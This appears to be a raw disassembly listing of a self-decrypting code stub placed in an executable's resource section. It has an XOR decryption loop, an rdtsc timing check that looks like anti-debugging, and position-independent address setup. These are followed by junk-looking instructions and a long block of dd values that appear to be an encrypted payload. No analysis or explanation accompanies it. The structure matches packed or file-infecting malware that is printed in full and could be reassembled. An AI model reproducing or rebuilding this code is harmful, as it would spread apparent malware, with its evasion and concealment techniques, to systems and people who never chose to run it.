sub_100B006 proc near ; CODE XREF: .rsrc:0100B07E�p
mov ecx, 0DD1h
push ebx
mov ebx, edx
loc_100B00E: ; CODE XREF: sub_100B006+12�j
xor [eax], dx
inc eax
xchg dl, dh
inc eax
lea edx, [ebx+edx]
loop loc_100B00E
pop ebx
retn
sub_100B006 endp
; ---------------------------------------------------------------------------
idiv byte ptr [edx]
; =============== S U B R O U T I N E =======================================
sub_100B01E proc near ; CODE XREF: .rsrc:0100B047�p
; .rsrc:0100B04D�p
rdtsc
call dword ptr [esp+0]
loc_100B023: ; CODE XREF: .rsrc:0100B069�j
pop ebp
retn
sub_100B01E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_100B025: ; CODE XREF: .rsrc:0100B038�j
; .rsrc:0100B03F�j ...
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_100B055
; ---------------------------------------------------------------------------
loc_100B02F: ; CODE XREF: start+1�p
test eax, eax
jnz short loc_100B03C
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
shl eax, 1Fh
jns short loc_100B025
jmp short loc_100B046
; ---------------------------------------------------------------------------
loc_100B03C: ; CODE XREF: .rsrc:0100B031�j
shr ebx, 9
jz short loc_100B025
shr ebx, 0Eh
jnz short loc_100B025
loc_100B046: ; CODE XREF: .rsrc:0100B03A�j
push ebp
call sub_100B01E
xchg eax, ecx
call sub_100B01E
add esp, 10h
loc_100B055: ; CODE XREF: .rsrc:0100B02D�j
push dword ptr [esp+4]
sub eax, ecx
pop ebp
sub dword ptr [esp+4], 1FF6h
sub eax, 180h
jnb short loc_100B023
sub ebp, 301006h
lea eax, [ebp+301083h]
mov dx, [eax-67h]
call sub_100B006
sbb eax, 36DBB3Ah
arpl ax, sp
sbb dword ptr [eax+6Ch], 4CEF6C6Dh
clc
mov eax, esp
mov bh, ah
jz short $+2
das
xor eax, 0A78B1C26h
fmul qword ptr [esi]
lodsd
or al, 0DCh
mov dx, 0AD35h
mov ch, 78h
mov ds:3A566BF2h, eax
dec edx
adc ah, [esi-7AC1321Ah]
jp short near ptr loc_100B0D1+4
xor dl, bl
leave
fisubr dword ptr [edx+ecx+463C862Dh]
lock out dx, eax
stc
arpl [ebp-44h], cx
or [ebp-7], edx
adc dh, [eax-2D955F05h]
loc_100B0D1: ; CODE XREF: .rsrc:0100B0B5�j
rol byte ptr fs:[ebp+ecx-46307101h], 1
fdivr qword ptr [ebx]
sub al, 6Fh
and gs:[eax], bh
aam 0DAh
stc
std
movsd
cmp byte ptr [ebx-6759233h], 0ECh
sar byte ptr [edx-2Bh], 0F6h
in eax, dx
fbstp tbyte ptr [ebp+7Dh]
movsd
mov esp, [edi+ecx*4-3Ah]
mov esp, 8885F0BDh
; ---------------------------------------------------------------------------
dw 908Fh
dd 70695B4Dh, 46113B37h, 0FE577FD9h, 989E9B3Eh, 0D9EF0AECh
dd 6657131Dh, 73203721h, 121B1Eh, 62F4A6D5h, 0E85D5E37h
dd 1709383Eh, 303A3C61h, 0E564A9F6h, 6D63644Fh, 0ED583485h
dd 76FDCC2Ah, 0C4AB22F7h, 0D65F5E6Bh, 0B685F73Ch, 1242C0CAh
dd 0E8C2E487h, 9986A12Ch, 4A546348h, 50042D9h, 0ADB685ADh
dd 0F1D55379h, 0BB951711h, 3F795DE2h, 0CDF7B0B0h, 0A19B86F6h
dd 0D734FF54h, 5C0D0C12h, 210C80C7h, 106E6E48h, 69A0F5B3h
dd 0F7FDA64Fh, 0B8B50E0Bh, 1BBECF29h, 0D3645279h, 0BB80A018h
dd 3FC12FCEh, 0DDE2C65Ah, 8BD72630h, 4F697BE7h, 8F956053h
dd 0B1BB6D47h, 0F6AB61F4h, 0D01E5B4Fh, 445E4C3Eh, 4FFAF48Fh
dd 0CEB09E94h, 0D7E1BF44h, 9DED1070h, 39736D81h, 0EE7BB2F9h
dd 9BA5A0EAh, 0CC635949h, 7607351Fh, 26148CD0h, 0B2E86670h
dd 90AA87A1h, 0D0355D5Fh, 5408F933h, 0CEAFC8CBh, 39A1D045h
dd 0DD4EBF9Eh, 0AF13284Ah, 4D03EEC8h, 40A8E3A2h, 5415AE4Ah
dd 7980E9DCh, 3F4BB2BDh, 0DBD5CFD7h, 8936D09Dh, 0C5C34A8Fh
dd 0F9787682h, 9EC3A7DBh, 0D0DED88Ah, 10B6193h, 0A7C33A45h
dd 635D474Fh, 10915C23h, 0C5CFCF0Ch, 9DAFFE62h, 26342F39h
dd 0BFA06000h, 89F8C697h, 0B9C2AA9Ch, 7F0BF3FCh, 1B150814h
dd 4D565F37h, 47127990h, 46B887EDh, 0DFE9E8F7h, 1018B3CAh
dd 184B2054h, 78167166h, 8F6F3949h, 2535DDD7h, 5BB28DDBh
dd 36400F65h, 65FCF475h, 9E4AA1ABh, 87D3D2DCh, 0B6484759h
dd 5DA0CC3Dh, 0D1665442h, 0BD802E2Ah, 3301F5D0h, 0DED425BCh
dd 8C249932h, 50589A8Bh, 83360994h, 0B2BC8BE8h, 0E1B468F9h
dd 91951D27h, 457F628Eh, 0F9810F76h, 979A223Fh, 4A5F60EBh
dd 0F6132237h, 354443B2h, 6B774EF9h, 76232EAFh, 32D7E6CCh
dd 7B870661h, 2F091C9Eh, 4BB5D5F3h, 6E649993h, 45C3CAD4h
dd 0F2FCF91Eh, 0FF7A9BDh, 24A15D57h, 630A0199h, 37C08FE2h
dd 0D7DA1647h, 18DDDE2Bh, 0B5D45D5Ch, 0F184838Ch, 9B996A33h
dd 23FF06EFh, 88981751h, 3E786CA2h, 448AC503h, 5F55A983h
dd 56D4DAE4h, 20C0ACEh, 333CDAAEh, 3CD3E077h, 1E9FAE85h
dd 30D0A516h, 0F371FFD3h, 4231D1B9h, 0E9A622Bh, 92FE92F6h
dd 0AE527640h, 0F54FF4CEh, 9027252Fh, 0B1A61B64h, 0D4EF786Eh
dd 0B0F7BC4Fh, 87EBE9F3h, 165B978Fh, 0EFA979FEh, 8F9CD7E0h
dd 0A5C5793Ch, 0D6807380h, 6DDD8419h, 5286CB4Ah, 6973197Bh
dd 0DACEAAACh, 0C5BF818Ch, 1E93FB5Eh, 75370412h, 3628A1ECh
dd 8F99F60Dh, 0C0A0135Ah, 0F4903489h, 23412959h, 3A5C3036h
dd 838DEB38h, 0DEEFBCACh, 7010BD08h, 161032CEh, 0B8D41606h
dd 79BF0485h, 1C3EB1BBh, 0DAD4F2ECh, 0B1D3FA4h, 0CFA9CF4Eh
dd 6D9AF4DAh, 13A896A0h, 0FFCDD064h, 8DEAF712h, 12276D6h
dd 0F7933874h, 93ADB73Fh, 0C4CEDA3Eh, 9B91B107h, 755F5B53h
dd 3F16361Bh, 0E2F6F5F6h, 0CDAEA09Dh, 0B9F3B399h, 3616B6D2h
dd 0CEDC546Eh, 7CB6A9B9h, 8DDDE290h, 4B17189Bh, 0F2934CCh
dd 351589D6h, 7311ECBBh, 7627FDE3h, 3B8FDD8Ch, 40E0D06h
dd 507B5B1Bh, 36171A1Bh, 0FED7C9D8h, 0ADB5B4B7h, 6CFC540Ch
dd 2A041E0Ah, 0D33A7E6h, 0DBC0C4C8h, 91155030h, 2974F630h
dd 8BD77021h, 4F697444h, 82E089F9h, 9DE52F3Bh, 0CA55EBC5h
dd 841D1C27h, 48C7AC7Ch, 8A282AACh, 969C052Ch, 5417D3EAh
dd 383F57BEh, 6E17424Ch, 46DAE682h, 5B20A49Eh, 4F9089ABh
dd 137502EEh, 261C42BFh, 7503671Bh, 0BC3C0D5Dh, 14EC9E3h
dd 19682670h, 222C2FC4h, 0B0CC9555h, 0C20BB4A7h, 0C0BF8EE5h
dd 0DF316ED1h, 4721203Bh, 1904010Fh, 86D0D2DCh, 9A98E528h
dd 822561EEh, 78E91A6Bh, 0B8C84E74h, 6E485AC7h, 6054C45Ah
dd 45258A1Ch, 13B2632h, 0F6BDA3AEh, 636D6D5Eh, 0B20B62F0h
dd 3ACFFEF4h, 0C5D3D99Ch, 0DCC1D93Ah, 57619E94h, 0D292929Ch
dd 0E8920AFEh, 0EB9CA5AFh, 9025212Fh, 260607A4h, 2F430C9Dh
dd 0D8DDEE01h, 37E9BDA7h, 0EFE5E5FBh, 5406DED8h, 232E7CB6h
dd 3652FDE6h, 0D4EEF2C2h, 0C62FCB9Ah, 36181812h, 677151D6h
dd 98A2B257h, 0C9D3D3DCh, 0FA04040Eh, 2B35343Eh, 0A335333Eh
dd 0BDBBA435h, 12916CD1h, 158D3886h, 43EAC7D1h, 35293B26h
dd 0E4E6EADBh, 0D8DEF3A2h, 90998E92h, 777B4D74h, 453B192Dh
dd 4F4F3E6h, 0A7C5D0D8h, 0AA969180h, 97D7671h, 5B21360Dh
dd 233100Bh, 9CE7C3DCh, 0ACB2A5A2h, 974E6D66h, 4E745D2Eh
dd 0E031903h, 0D29BDBC3h, 0B6ADAEA7h, 9D8EAC63h, 505E4854h
dd 261D5E29h, 0E0FBEEFCh, 0D9ADA598h, 8FA5948Fh, 7C43475Eh
dd 2C21105Dh, 2EE1F0EFh, 0CAD0C7D7h, 0AEA5E694h, 68637644h
dd 52272706h, 1F151CEBh, 0CEF99887h, 0B9A8AB84h, 470C7879h
dd 6749543Fh, 50B1C10h, 0F0D89FCDh, 0AAB996AEh, 8375406Eh
dd 5D505849h, 18100718h, 0FEF1D49Dh, 0DEA9AD88h, 898C9CACh
dd 69426130h, 2B343E27h, 1AE4E1C6h, 0C4DFFEC3h, 948F85B9h
dd 7B5A7E49h, 2203293Ah, 743F18EAh, 0E8DBCBFFh, 0BA95BB86h
dd 6970587Fh, 79272D2Fh, 1D16357Ch, 0EED7DAFEh, 0A291B9BBh
dd 8865607Dh, 6C4E4750h, 2A0D2170h, 0FFF4F2F5h, 0A5A6A194h
dd 9597984Dh, 446C2A75h, 3F390F11h, 0F7ECDCE6h, 0F3BEFCAFh
dd 80B99A9Dh, 79496C5Bh, 22165034h, 0AE7D7FFh, 0C7DCDBCFh
dd 0DAA59BA8h, 5D617159h, 51332920h, 0B193FE5h, 0FFC5D5DEh
dd 0A1B6B196h, 654D0952h, 5F526D30h, 111B0411h, 0F6EFF5E2h
dd 0B6A1B9B4h, 98B9FE71h, 494E4D56h, 390C0C2Bh, 0E8DD91F8h
dd 0D18EA6ADh, 9B92819Fh, 57246557h, 2203253Eh, 1AC9F1F5h
dd 0C8DBDE87h, 0BB98A7F2h, 63705F4Dh, 302B0731h, 161512F5h
dd 0D2E3ACF7h, 0A18DB382h, 776B6D77h, 476F3F3Ah, 15151315h
dd 0D19392D8h, 0BCA1A0B5h, 9671530Dh, 5947565Eh, 3E2B565Dh
dd 0DE96E1E7h, 0FBA3A7B5h, 0ED929B68h, 585C4D61h, 0E3C350Ah
dd 0E9F8FEE0h, 0D4CFCEA7h, 0B1ECAD85h, 7A5B6942h, 2B1E2B34h
dd 100B11E0h, 0C3E3B0C8h, 0BB88A79Fh, 657B4679h, 55104328h
dd 6A04111Bh, 0FAC8CBFAh, 0A9BF8090h, 0BB614866h, 2E5D5B28h
dd 2B1B0124h, 0D1F6F8D6h, 0A2A4A6B8h, 9889AC05h, 4B6A4942h
dd 1D5D380Bh, 0EEEACFECh, 0E5CBCCBCh, 8F869988h, 72464447h
dd 233D062Fh, 3783EDE8h, 0CFC6F7CAh, 9D80918Eh, 0C737A49h
dd 4F04331Fh, 0B0C19E7h, 0FCC6DBE3h, 0D0A9A981h, 73487F5Bh
dd 57485D23h, 21F27h, 0D1EDEDCDh, 0B181CFA1h, 97657249h
dd 4262554Eh, 370B1508h, 0FDDD92F2h, 0ECB4A280h, 0A4829197h
dd 7F437649h, 23383F14h, 31FCC991h, 0E9D7DDB2h, 0E08F859Ah
dd 61546E6Ah, 301C2530h, 181FE9h, 0CFC1F9C4h, 9BDFB08Dh
dd 6360406Dh, 54241324h, 61D180Fh, 0C9D7ECACh, 0AFA0BCAFh
dd 9253706Dh, 4D43404Ch, 30022803h, 8EE1E4CFh, 0CA98B39Fh
dd 0BC808A67h, 455E5A4Ah, 37351309h, 0E3E1F9FAh, 0DDD2D5B2h
dd 0B39AA3F7h, 706B775Ah, 3222260Fh, 3AEDE1FFh, 0DADDDCDEh
dd 0ADB1E295h, 637A4671h, 5E212B2Dh, 504012Ch, 0F2F3C1DEh
dd 0A7ABB9A0h, 967B7C41h, 673A5F2Ch, 15382820h, 0E7E8E8C5h
dd 0AFAECBA5h, 80988F69h, 41454E58h, 3A3C5E1Ch, 0E5F5E1F7h
dd 0D2A6C0BEh, 9B9D998Fh, 775A4058h, 4A313E3Ch, 0DE6E1FCh
dd 0C2D3C6BFh, 0B294E694h, 7A7D7C42h, 4B270152h, 15140BE6h
dd 0CEC7E9C0h, 0B394BE96h
dd 66616878h, 40507447h, 11C1Dh, 0E2C5D8DDh, 0A9BFBF99h
dd 9D76626Eh, 4847625Fh, 13640718h, 0F9F0E7F3h, 0F3B2A1A0h
dd 0AC99908Fh, 6A466F30h, 2A372504h, 0E5FAC7E6h, 0DDC9ECADh
dd 8CA5EAB5h, 7D6F7E51h, 211C3833h, 1C3919E6h, 0E7B0CBD4h
dd 87A089ADh, 26202353h, 390F0D0Fh, 2913172Eh, 0FED6CCC1h
dd 0CCAFB195h, 0B260605Dh, 6556504Fh, 272C1F15h, 0F5C897E0h
dd 0A4BE99B5h, 90AD8071h, 67495F58h, 15D1A1Dh, 0E1DDEBF3h
dd 0D9DEEBB3h, 9EB58B8Dh, 0FEA21F68h, 199A7B5Fh, 798381E3h
dd 8EF83F54h, 0B1E589EEh, 5F46451Bh, 0F1CC4025h, 3EACFDD0h
dd 0CEE9CDE5h, 45258BB0h, 13B25E5h, 0CD30FEC7h, 534195E0h
dd 9C5A1FA6h, 40429A14h, 0F5CFEBA1h, 4C60D00Ah, 0A86F0A6Ah
dd 0B8BE330Eh, 0B60347CCh, 0EAF46379h, 0B64D742Eh, 0C756553Fh
dd 0F687EC44h, 0C6F8DD0Dh, 0DFF9E8F2h, 7A481B49h, 21E62254h
dd 72167B85h, 5CFDFFE7h, 0E4F23B72h, 0FA565118h, 66C19DCh
dd 138EF57Ah, 182F2AF7h, 2AD3E2C9h, 0FA918E01h, 2835032Dh
dd 0A33533BFh, 5B121E4Dh, 33C8F6FCh, 0EEE3668Eh, 0E07DC032h
dd 0D5D1A69Ch, 81BBA67Eh, 0A9623448h, 0A005ECF6h, 9FE1E2D8h
dd 756394DDh, 930FF289h, 4FB1B0A1h, 271D1ED9h, 25CD9797h
dd 0FAC1437Dh, 0E4F87F0Ah, 9CA6BE5Dh, 3228CB08h, 0A1CF8CEEh
dd 2FD16282h, 3D6A6872h, 8B187422h, 0BFFCAE4h, 0D3C57E88h
dd 777C2C06h, 50E0C36h, 0DF1A71C9h, 31C08FE5h, 720ED4FEh
dd 18120D0Dh, 49579001h, 7A846BD8h, 2AE8B4BEh, 0ECFC5702h
dd 80E87C20h, 0E523AC4h, 0A22B2882h, 8AAA8D93h, 0DD1F59E4h
dd 0C189CC73h, 0FE3D0C5Ch, 0A1EBAA57h, 0B19FAEB2h, 9BD0E5D9h
dd 9D006AC9h, 0D701CF3Bh, 4C9C6518h, 7AE05219h, 0BBC5C8A5h
dd 0B7267FFEh, 901B752Ch, 7E42B7D5h, 73330C91h, 3BBAB8C3h
dd 0E1EAE179h, 39E41924h, 88C62B9Eh, 1FDA75h, 504DEAB2h
dd 11631C03h, 0D39A5816h, 688ECB19h, 38331B2Fh, 655BC8FEh
dd 0FBF92548h, 0F0C2870Eh, 155A1B5h, 8943655Fh, 489E7C23h
dd 28CAADD6h, 0F3AD7102h, 71BE40F0h, 575C6A49h, 0B0858311h
dd 0AE0EFE06h, 0C8BF787Eh, 0F4D71E18h, 0ED300DD4h, 99F74974h
dd 0A95BE478h, 87E4E2ECh, 1066FE9Ch, 0A1CD447Eh, 6D47582Bh
dd 968CDA33h, 765DD8E1h, 810A0812h, 313931AFh, 66043E74h
dd 6C9D9BA4h, 0F4E24E43h, 79027607h, 242B0ABCh, 3C305F69h
dd 8795789Ah, 0EA94C1CBh, 16A4F2A8h, 2A085DB8h, 0C69C675Eh
dd 7C878118h, 0C7E6E7C0h, 0DF82B6F3h, 0F19184Ah, 0D5B51B13h
dd 714B56CEh, 0D65A2E23h, 0BB898CBDh, 40E0C13h, 118BC11Fh
dd 66706D59h, 0BA933555h, 4D8BD1EBh, 1A1576CCh, 0FEBF6228h
dd 0A376307h, 1969C2C9h, 0BDF7E901h, 98377359h, 8BD771E1h
dd 4F697444h, 0D2CEDE1Eh, 0E9FFD093h, 0E3E87C78h, 20B61C26h
dd 1D5E2797h, 252FD57Bh, 0F6E0FFE9h, 421EB2BAh, 8223D49h
dd 3B4B86CDh, 1E8B737Dh, 0E5AAC8Ah, 0CCE6F8FDh, 0DF92F943h
dd 7338066Dh, 0DF6963B3h, 91EF929Ch, 0BD464295h, 12FBCA11h
dd 22B9A62Ch, 505D6C76h, 5671DB46h, 3DB07E4Ch, 0E6F0EF06h
dd 17D1A425h, 76D2515Bh, 3F93F7B6h, 0A5B48D3Dh, 0DBE5056Ah
dd 2C28951Fh, 0BC01B725h, 203127BFh, 148BDDF5h, 0D19C1F2Ch
dd 50C5215Bh, 646D3B2Fh, 79F89325h, 0CD9EAD8Ah, 40C00FE3h
dd 0F5FFFFB6h, 263081D3h, 75FE06Bh, 87C4DBCEh, 0B9C36648h
dd 0E23277FEh, 14281983h, 4C56CFE4h, 8A7BB91h, 94841431h
dd 0DF656CFCh, 1DB71A24h, 616B6B75h, 171B5DBBh, 0FD2D8C3h
dd 0A8ABFED4h, 25F07198h, 43343422h, 640FF00Ah, 0B78D98DCh
dd 8E15BBA8h, 0CB0B04F1h, 2B122484h, 0E84926Fh, 0A155035Fh
dd 7EFBC7E1h, 0BEA8A852h, 1F2920DBh, 27351E64h, 0E0E4E7FBh
dd 2743BCA2h, 0E3DDC0DDh, 226ADEADh, 0C0C6866Ah, 76B0ADDEh
dd 0A4B1D9EAh, 89B366ECh, 9CEC434Bh, 3A746960h, 7018E0F2h
dd 0AFF6A680h, 9D868328h, 1595940h, 1F1562D7h, 446EEE73h
dd 0BDBD0F5Bh, 134CBE5h, 0E7937186h, 0DA2C2D07h, 595453ABh
dd 0D2AFC093h, 9AACACA3h, 889985DBh, 70410259h, 2C343D3Ch
dd 5AE2EBAEh, 0D9D0C3DAh, 0B988C689h, 2D3B7344h, 5068313Fh
dd 91D1CE6h, 0C5C4C6C1h, 0F1FAA896h, 706D7C45h, 56501D22h
dd 16010858h, 0F0F1F089h, 0A3A2B7FAh, 8121756Ah, 47465252h
dd 79421B1Eh, 879E9EB0h, 9F994FC4h, 0ECF61DFBh, 9C7A2630h
dd 7E45818Ch, 0E3340392h, 3BBA89F3h, 0D1DB4E41h, 99E71825h
dd 737DECDBh, 0FFDB8E87h, 959F323Dh, 4E7554E9h, 411202Ah
dd 872D1CEh, 171FB7Ch, 9AA4B025h, 0E7174121h, 35ED053Fh
dd 5B527163h, 20D0519h, 0FCE0FFF1h, 0ACABABBBh, 9F979C4Eh
dd 122B5346h, 93D0B7h, 0DF5560h, 0F4D4BE26h, 0B7B817FBh
dd 0A3AD0743h, 47614E4Eh, 78829632h, 0E4B73FBCh, 251B1C13h
dd 0F98BF78h, 3C464502h, 0E0DC1080h, 0AC03A3F6h, 64BF7406h
dd 9587F2F1h, 310B0AC8h, 306A0121h, 0BF6F0959h, 0B045CDE7h
dd 307DF62Ch, 2AEFAA21h, 5661C5EFh, 0EF91FB9Bh, 0B8C2C3ECh
dd 16F899ABh, 2A08DEBBh, 470BDE5Fh, 0F596C81Bh, 9D87275Ch
dd 4A6561F2h, 8E192913h, 0BFBA4AB7h, 1B282A8Ah, 5DAAC6B6h
dd 0E3ED5152h, 9A9BF118h, 653F0F65h, 56FCC585h, 25EA19Bh
dd 0C8E2FEFAh, 6AC38655h, 2B60B732h, 0DA03646Eh, 0F8CCD8A4h
dd 283895DCh, 0EDC7DBC7h, 1E2969DBh, 87E7D463h, 8F8A8A94h
dd 3CA5F572h, 8AF3DD82h, 131D1C23h, 3EDBB10Fh, 237F4FA5h
dd 0E4254FEDh, 5CE1D1C7h, 0CB112E5Fh, 3A3B13C6h, 4A06FFADh
dd 16BDEF24h, 6187E5D4h, 8586C412h, 4B6B5240h, 0BD6C1C00h
dd 3D71C051h, 4AEFC6FDh, 0F2A2DF77h, 3E7EA7C5h, 1D59EA68h
dd 0B0055D9Bh, 3E4CBC4Bh, 5379F8B4h, 171111B3h, 0FD6964D7h
dd 79B3B31Dh, 1F9F37CCh, 0DBD5D57Fh, 3C82A31Bh, 0BE484761h
dd 918787F3h, 2A206980h, 0D0EAEA78h, 31AB869Ch, 626C3C76h
dd 93D6E1Dh, 949EF6A9h, 3A984FD9h, 0C615788Fh, 6DA4CF3Ah
dd 0A7625147h, 0B986EA11h, 453C40CDh, 14CE70F1h, 99AFDAD0h
dd 4D6766ECh, 7EE287FBh, 3A46E894h, 0E0DAC549h, 21BB9FAFh
dd 0A28D4B65h, 192D2C84h, 323B52B7h, 5CDFEEC4h, 3620AB9Ch
dd 5D95CB4Ah, 5A8D237Bh, 15165DFCh, 35D4E3EDh, 0CB29B69Bh
dd 0A0B3BF3Eh, 0D467555Fh, 1B67B2A4h, 0BFF9EBF7h, 64C5AB89h
dd 101A8D86h, 4B0FD164h, 0A97200A1h, 838D2C53h, 446366F7h
dd 0B81F2E18h, 0A4FB8D72h, 0BA040D70h, 0F9B281A6h, 88B3B1BDh
dd 5081EC4Ch, 6B457462h, 4050E080h, 0B864A680h, 0F4F2ED92h
dd 9D686677h, 0A5E5D2Eh, 4031A33h, 0A0AFF6C8h, 0AFA1AFFBh
dd 0F3CCD12Ah, 707D7464h, 1603132Dh, 0E3E2FDECh, 0D882B4A4h
dd 87808595h, 6D467140h, 38310001h, 1EE6EDF8h, 0C4E5E9CCh
dd 0B9829491h, 6B7B7460h, 6F153B21h, 1D1B0BE2h, 0D3CEDED1h
dd 0BB9A8796h, 627A6964h, 5B6E512Bh, 1C0C0714h, 0F7D4CCF5h
dd 0B5B0B4B4h, 9770516Fh, 4C5F585Dh, 2E112330h, 0E2E7FCF5h
dd 0FDA2A1B4h, 849B858Fh, 775C4753h, 132A390Eh, 0F4F9E1DEh
dd 0F7F4EAC3h, 0B0ADBDA0h, 7A504760h, 37213E35h, 290B1BE8h
dd 0C2DEC7EFh, 8B92A886h, 7A606559h, 6F372F2Eh, 3070019h
dd 0DEF9CDC2h, 0A3BAA4A6h, 0FD75607Dh, 494A546Bh, 30211215h
dd 929AE3D2h, 929BC8D2h
dd 81FDE947h, 4B544546h, 27337508h, 0E8E0FEFDh, 0DC91DCB7h
dd 0E69F8896h, 5C625667h, 2937357Ah, 1FF5F3F8h, 0F9E1B8CCh
dd 0AEC5B1A8h, 425F5B54h, 5431636Fh, 5D0D02F2h, 9F41F2BBh
dd 8DDAD8E2h, 2034E492h, 0B7FA3A74h, 635D7E1Ah, 120B63A6h
dd 4CFFDFBh, 0A48BE1E0h, 93BB3153h, 57514C50h, 0A6AE3DC2h
dd 38A5E8B9h, 9FE90CC3h, 5198A90Dh, 0C7566572h, 0D8D084E6h
dd 2B3512A7h, 0DFD9C395h, 3B979CACh, 0C8B14A64h, 3CF081C3h
dd 0A21C5748h, 61531205h, 53F2340h, 36413B21h, 0F28E267Ah
dd 98928D39h, 0C9D35B35h, 53818E0Dh, 7B350328h, 520C6404h
dd 0A1350060h, 0C24BC6E0h, 9BFCFF25h, 1F21C043h, 16095963h
dd 0CDCFA4D7h, 2743BB89h, 0E3DDC080h, 6ADD2Ch, 0AD1F4C32h
dd 897F8685h, 8B832545h, 1867E1DBh, 0D9EC1068h, 3A4448A5h
dd 2833277Eh, 0B2F5EAF0h, 0CD9B9AA4h, 0D27E92EEh, 0CAD13771h
dd 0ED95978Ah, 0A1B6C116h, 0C3C8A2D4h, 0DAAFB05h, 130156A3h
dd 5453B567h, 0C1D38E98h, 0F396F69Bh, 0A2ADA3A8h, 4E22627Fh
dd 6511C7A3h, 7D6C83BDh, 0F7B5B4BEh, 88B5AAA7h, 0F2411673h
dd 0E6405C4h, 3EB04B82h, 0F1A9C3E2h, 0D1B3DB8Eh, 544C0B15h
dd 1F77A9B9h, 9CED6D47h, 0C5BCEA57h, 0EB885A54h, 7A8C003Ah
dd 280217CEh, 31316101h, 8A949286h, 2E3A939Ch, 0ECC6D830h
dd 3101B0D0h, 45B05650h, 2A898791h, 83E8FD91h, 0ADAFC7C1h
dd 87E31A68h, 437D67CFh, 747E766Eh, 0D5DCDAB7h, 0A28EB79Ah
dd 57114E7Fh, 1470D5B5h, 0ECFA714Bh, 9A948E92h, 4658E2D2h
dd 0FC361D41h, 67B1B7h, 0A139655Fh, 0BFB50C35h, 0C4A254D1h
dd 7DFAF802h, 11327586h, 0EFD10364h, 83BDA6A3h, 4B4C1F2Eh
dd 60288B08h, 16103ED5h, 0E2D21F59h, 78B2A075h, 14263CBBh
dd 8AE4D2CCh, 61147949h, 3E2E164Eh, 92F7757Fh, 0AE859C25h
dd 951952E1h, 8D872A67h, 310B19B3h, 0EF6A0026h, 0A3BD6610h
dd 949898D6h, 0BACAC57h, 150210ADh, 0C39F0769h, 87A1BDACh
dd 9795440Dh, 1F3F2CCh, 0E5DBD13Ah, 592BD9A1h, 0F94185BFh
dd 0AD87A38Dh, 0EDB7B3A7h, 0F0EB1ACAh, 0DCF8EACh, 277B4A91h
dd 4A98F4E1h, 2C222D15h, 114388D0h, 4D693E78h, 82985B26h
dd 505E5F5Bh, 0F8C79C5Eh, 8F66540Ch, 0A7FD0168h, 6B55CBE8h
dd 0DDC7C59Eh, 0EC96959Eh, 63620951h, 0E128171Dh, 7F75DEF7h
dd 9F624893h, 0BD53CEB1h, 0B1ECEBF5h, 524A506Eh, 600407h
dd 8A7F32C4h, 969C352Ch, 0D7ED08EAh, 4041111Bh, 6F37271Fh
dd 0F011F1Ch, 64F5A4EFh, 0FCFAE74Ah, 488A9510h, 2E081B18h
dd 5F69AF19h, 90F0CEA2h, 0EDB95C2Ch, 6476FA34h, 221C0B1Eh
dd 7D7DE1EBh, 0D6D88DA7h, 8B2A419Fh, 65F0DFD5h, 82AC2CEEh
dd 48627113h, 78E9D5DCh, 0A8DCE1EBh, 2465E4EEh, 0F60BFDCCh
dd 80C4B9AFh, 6E4862B2h, 0F7A2DCB2h, 0D0DACA6Bh, 2DC99FEBh
dd 3ED43B75h, 346D6C76h, 0DFDDD2F4h, 81E1FCEBh, 0AFFB345h
dd 161CAAAFh, 5009F26Bh, 592929Ch, 89DB7078h, 5779ADFEh
dd 1B150829h, 0B3A76588h, 7D8B6F6Eh, 0E7EFB8C2h, 9AA7A0BDh
dd 5C5E3470h, 0D4B44B19h, 724C501Ch, 27A26D32h, 0D4DEDCDDh
dd 50A678Ah, 83CD404Ah, 6741698Ah, 0BA1F2FF5h, 21D3E3F0h
dd 5FBF4F2h, 61389BDh, 5366655Fh, 8D958624h, 2E2446D1h
dd 0BAF8F803h, 1F28285Bh, 56CFA564h, 8BBBB8h, 0B2BD2C02h
dd 3766BDF7h, 0EB4C1E42h, 756269CCh, 2F40058Ah, 2FD9BCCEh
dd 27E2E2FFh, 393FD188h, 0B9A6AF4Eh, 5B558AC2h, 0B5D3A6B0h
dd 0ECD4526Ch, 1580822h, 1F142AD7h, 6FAAEC73h, 919A1320h
dd 0CE8C40D5h, 0C203FC8Dh, 3D2A8B8h, 0D1985E58h, 85BFA0CEh
dd 0DCC0AACBh, 18F39BFAh, 280F3CB9h, 0B6ABD05Dh, 7BE40081h
dd 2626B5BFh, 0ECC61D65h, 5F077D21h, 30DDB701h, 0EA7949AEh
dd 0E02FA574h, 5CDBDBE4h, 322D11ABh, 0DB358C47h, 9B91986Dh
dd 959F0BC1h, 20FB8EDAh, 0A3253582h, 4B8A4C4h, 0E4EE625Ch
dd 8AA4B2B6h, 4D2DC57Fh, 61090A0Ah, 2D063EA5h, 26583D61h
dd 7F898886h, 2545EA91h, 0E1DBC7EEh, 6385FA8h, 73E5D9DBh
dd 7B2E7DB7h, 0E124A40Eh, 3621CBCDh, 65B1212h, 2A400B59h
dd 2D787136h, 7B24AB89h, 0C33515D1h, 0D8420E5Eh, 7D05CA2Fh
dd 7330DBFDh, 93719791h, 0E5CAC8D2h, 0D082CF2Dh, 1050A1Ah
dd 77797E5Fh, 0A6F5B4B8h, 0C79B9DBFh, 0ACA0A4F2h, 41203F67h
dd 6B6FC5A5h, 0BC0381BBh, 0A9B3B210h, 8DB4E387h, 1180EB4Dh
dd 0B7467562h, 5D62450Dh, 7DA8CDB1h, 0C210B3F9h, 0FE142h
dd 141D3A44h, 356C6111h, 0BFA30959h, 4DCDE7h, 0FF15AE04h
dd 252F2751h, 67DDED6Ah, 0D091A1BAh, 0A2573D9Fh, 6CF3C3D0h
dd 97705AEEh, 7B780DEAh, 4F230590h, 0ADB787D4h, 0F1BF657Fh
dd 0C1321913h, 161B4A3Eh, 67EE84D6h, 21AC9C9Bh, 0FCA3DD1Fh
dd 89F08589h, 51267FCh, 947DC07Ah, 0F7B1D405h, 37272C34h
dd 0EE7162F2h, 5DB93ADEh, 0D08F8F6Fh, 158BE50h, 8DEA9E6Dh
dd 6A530401h, 4D91C3C5h, 6253CC9Ch, 3D0A8AA4h, 0B18BAEAAh
dd 8AC698F7h, 131D6817h, 688CDBA7h, 0C8FF7FB9h, 0A6809FEDh
dd 10F095EBh, 3832ED99h, 3943434Dh, 3DF1B27Eh, 9BA59580h
dd 3328DE09h, 0F9C55AEEh, 768DBA41h, 969585Dh, 0BCFC0C5Ch
dd 3948CAE4h, 4A7FF4FAh, 0AB2C2C36h, 636D01E2h, 0D28EE498h
